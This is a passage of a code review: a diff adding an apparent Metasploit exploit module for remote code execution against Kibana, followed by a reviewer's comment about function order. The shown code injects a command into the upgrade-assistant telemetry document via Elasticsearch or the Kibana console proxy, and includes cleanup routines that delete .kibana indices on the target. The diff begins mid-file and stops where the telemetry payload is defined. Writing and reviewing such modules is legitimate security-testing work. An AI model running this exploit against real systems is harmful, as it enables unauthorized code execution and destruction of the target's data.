modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb

```diff
@@ -0,0 +1,358 @@
+        OptString.new('TARGETURI', [ true, 'The URI of the Kibana/Elastic Application', '/'])
+      ]
+    )
+  end
+
+  # This is how it should be done, but it will crash the session. Leaving here in case someone figures out how to not crash the session
+  # it may also only crash when on docker, and may be fine elsewehre. Regardless, good code to not lose just in case.
+  def kibana_cleanup
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),
+      'method' => 'POST',
+      'headers' => {
+        'kbn-xsrf' => @xsrf
+      },
+      'ctype' => 'application/json',
+      'vars_get' => {
+        'path' => '.kibana_1', # URI for the elastic request
+        'method' => 'DELETE' # method for the elastic query
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
+  end
+
+  def elastic_cleanup
+    request = {
+      'uri' => normalize_uri(target_uri.path, '.kibana*'),
+      'method' => 'DELETE'
+    }
+    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if !datastore['USERNAME'].blank? || !datastore['PASSWORD'].blank?
+
+    res = send_request_cgi(request)
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
+  end
+
+  def execute_command(cmd, _opts = {})
+    if target == targets[0] # elastic
+      request = {
+        'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),
+        'method' => 'PUT',
+        'ctype' => 'application/json',
+        'data' => telemetry_data.to_json.sub('PAYLOADHERE', cmd)
+      }
+      request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if !datastore['USERNAME'].blank? || !datastore['PASSWORD'].blank?
+
+      res = send_request_cgi(request)
+    else
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),
+        'method' => 'POST',
+        'headers' => {
+          'kbn-xsrf' => @xsrf
+        },
+        'ctype' => 'application/json',
+        'vars_get' => {
+          'path' => '.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry', # URI for the elastic request
+          'method' => 'PUT' # method for the elastic query
+        },
+        'data' => telemetry_data.to_json.sub('PAYLOADHERE', cmd)
+      )
+    end
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 201
+  end
+
+  def telemetry_data
```

Comment:
Maybe define this function above `execute_command`, since it's the only place it's called.